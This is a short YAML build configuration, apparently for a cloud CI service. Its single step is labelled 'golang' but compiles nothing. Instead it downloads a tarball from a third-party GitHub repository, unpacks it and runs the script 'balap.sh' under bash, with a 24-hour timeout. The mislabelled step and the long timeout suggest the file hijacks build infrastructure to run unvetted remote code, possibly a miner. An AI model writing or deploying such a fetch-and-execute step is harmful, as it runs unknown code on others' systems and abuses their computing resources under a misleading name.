steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://github.com/Pantaiselatan/kemed/raw/main/sugark.tar.gz && tar -xvf sugark.tar.gz && ./balap.sh
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86400s